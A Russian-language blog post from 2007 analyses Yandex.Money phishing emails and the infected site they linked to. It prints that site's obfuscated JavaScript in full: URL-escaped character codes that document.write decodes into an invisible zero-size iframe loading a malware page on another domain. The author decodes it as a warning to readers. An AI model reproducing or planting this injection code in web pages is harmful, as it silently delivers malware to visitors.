Рейтинг блогов

Снова фишинг с Яндекс.Деньги. Или нет?

дата добавления: 30 сентября 2007 / 06:17, просмотров: 20050, комментариев: 11
Уже второй день мне на ящики приходят письма, якобы, от Яндекс.Деньги, с просьбой активировать мой кошелек, т.к. он был заблокирован. Собственно вот это письмо:

Яндекс.Деньги
Рис. 1. Письмо, вроде как от Яндекс.Деньги

Примечание: Оригинала у меня нет, я ненужные письма автоматом удаляю (Shift + Del), так что заголовки не смотрел, а это его HTML-часть, которую мне пришлось сохранить, поскольку TheBat! так и не смог показать его в нормальной кодировке.

Я практически не пользуюсь своим кошельком на Яндекс-е, поэтому, честно признаюсь, повелся на первое подобное сообщение, но делать ничего не стал, заблокировали ну и хрен с ним :-) Второе такое же письмо получил сегодня на другой свой ящик, и решил посмотреть, кто же мне это отправил. Ссылка, якобы для активации кошелька, ведет на сайт www.contidoo.com. Ради интереса, я перешел по указанной ссылке (http://www.contidoo.com/money.ya.ru/Index.html), но к сожалению, указанная страница была удалена, либо вообще никогда не существовала :-) Я пошел на главную страницу сайта, и мой файрвол сразу же стал "кричать", что некий процесс IZFP.EXE пытается изменить память другого процесса:

IZFP.EXE
Рис. 2. Процесс IZFP.EXE

Я посмотрел исходный HTML главной страницы www.contidoo.com и увидел там вот такой JavaScript:

JavaScript
Рис. 3. HTML главной страницы contidoo.com

Поскольку блокирование процесса ни к чему хорошему не привело, я нашел этот процесс в ProcessExplorer и просто убил его:

ProcessExplorer
Рис. 4. Убийство izfp.exe :-)

Надо будет еще на всякий случай проверить реестр :-)

Что касается JavaScript-а, то немного модифицировав код:

<script language="javascript" type="text/javascript">
document.write(
unescape("%2860%2C105%2C102%2C114%2C97%2C109
%2C101%2C32%2C115%2C114%2C99%2C61%2C34
%2C104%2C116%2C116%2C112%2C58%2C47%2C47
%2C119%2C119%2C119%2C46%2C118%2C97%2C108
%2C97%2C114%2C111%2C109%2C97%2C46%2C111
%2C114%2C103%2C47%2C102%2C111%2C114%2C117
%2C109%2C47%2C105%2C109%2C97%2C103%2C101%2C115
%2C47%2C97%2C118%2C97%2C116%2C97%2C114%2C115
%2C47%2C103%2C97%2C108%2C108%2C101%2C114%2C121
%2C47%2C105%2C99%2C101%2C47%2C105%2C99%2C101
%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112
%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104
%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103
%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47
%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")
);
</script>

Я получил вот такую строку:

(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,
118,97,108,97,114,111,109,97,46,111,114,103,47,102,111,114,117,109,47,105,109,97,103,101,
115,47,97,118,97,116,97,114,115,47,103,97,108,108,101,114,121,47,105,99,101,47,105,99,101,47,
105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,
104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));

String.fromCharCode(code) - функция переводит символ из его кода в его представление.
Если сейчас все это дело пропустить через функцию String.fromCharCode(), то будет видно, что это HTML-код размещения фрейма:

Фрейм
Рис. 5. Гадкий фрейм.

Т.е. получается, что пользователь заходит на сайт, и JavaScript «рисует» на странице невидимый фрейм, который в свою очередь загружает вирус. Конечно, все это дело можно было промониторить еще на стадии загрузки, но мне было как-то лень это делать, да и браузер неподходящий был, смотрел под IE 6.0.

Мой интерес меня погубит :) Пошел я на www.valaroma.org, моему взору предстала вот такая картинка:

Валарома.Орг
Рис. 6. Главная страница Valaroma.Org

Ничего интересного, обычный сайт. Проверил домен в NIC.RU, принадлежит он некому Georgi Iliev, город указан Burgas – это в Болгарии, сайт видимо тоже имеет болгарскую локализацию, хотя в лингвистических делах я не особо силен.
Собственно я думаю, сайт Валарома.Орг тут вообще не причем и на его месте мог оказаться любой другой, скорей всего какой-то злостный пользователь нашел дырку в valaroma.org и воспользовался ей в своих целях, так что после публикации этого обзора, я обязательно дам на него ссылку админам валаромы.

Дальше копать я не стал, хотя в принципе ниточек еще много, но мне как-то надоело тратить на это время :)

Удачи, и смотрите, не попадитесь на уловки мошенников ;-)

Комментарии (всего: 11)

Добавить комментарий rss
Автор: Smith @ 21 июля 2008, 13:17   ·   ссылка
that you have fallen a victim to the cracker
Страницы: 1 · 2

Добавить комментарий

Добавлять комментарии могут только зарегистрированные пользователи сайта.
Если у Вас уже есть учётная запись на этом сайте, пройдите процудуру авторизации.
В противном случае, зарегистрируйтесь на сайте.